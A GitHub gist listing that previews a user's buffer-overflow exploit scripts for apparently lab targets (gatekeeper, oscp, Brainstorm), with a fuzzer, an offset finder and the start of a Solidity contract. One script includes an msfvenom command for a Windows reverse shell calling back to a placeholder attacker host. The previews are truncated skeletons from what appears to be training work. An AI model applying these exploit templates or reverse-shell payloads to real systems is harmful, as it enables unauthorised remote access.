Skip to content

Instantly share code, notes, and snippets.

View jayateertha043's full-sized avatar
🏠
Working from home

Jayateertha Guruprasad jayateertha043

🏠
Working from home
View GitHub Profile
@jayateertha043
jayateertha043 / exploit.py
Created November 27, 2021 12:48
gatekeeper.exe exploit.py
import socket
ip = "127.0.0.1"
port = 31337
prefix = ""
offset = 146
overflow = "A" * offset
retn = "BBBB"
padding = ""
@jayateertha043
jayateertha043 / exploit.py
Created November 25, 2021 15:12
oscp.exe exploit.py
import socket
ip = "127.0.0.1"
port = 1337
prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * 1978
retn = "BBBB"
padding = ""
import socket, time, sys
ip = "MACHINE_IP"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "
string = prefix + "A" * 100
import sys, socket, time
#Remote Victim IP
ip = '10.10.111.31'
port = 9999
#Generated using msfvenom
"""msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKERIP LPORT=4444 -b '\\x00' -f py"""
@jayateertha043
jayateertha043 / offset_finder.py
Created November 9, 2021 12:58
Brainstorm offset_finder.py
import sys, socket, time
ip = '127.0.0.1'
port = 9999
buffer = """Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8
@jayateertha043
jayateertha043 / fuzz.py
Created November 9, 2021 12:38
Brainstorm fuzz.py
import sys, socket, time
ip = '127.0.0.1'
port = 9999
buffer = "A"
counter = 100
while counter <= 3000:
buffer = "A" * counter
counter = counter + 100
@jayateertha043
jayateertha043 / CoinGen.sol
Created January 9, 2021 15:44
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.6.12+commit.27d51765.js&optimize=false&runs=200&gist=
// SPDX-License-Identifier: MIT
/*
* Author: Jayateertha G
* Email: jayateertha043@gmail.com
* Github: https://github.com/jayateertha043
*/
pragma solidity >=0.6.0 <0.8.0;
import './Ownable.sol';
0xec7D3b061F2f8B4a3f8A7025960cc10Cd773945E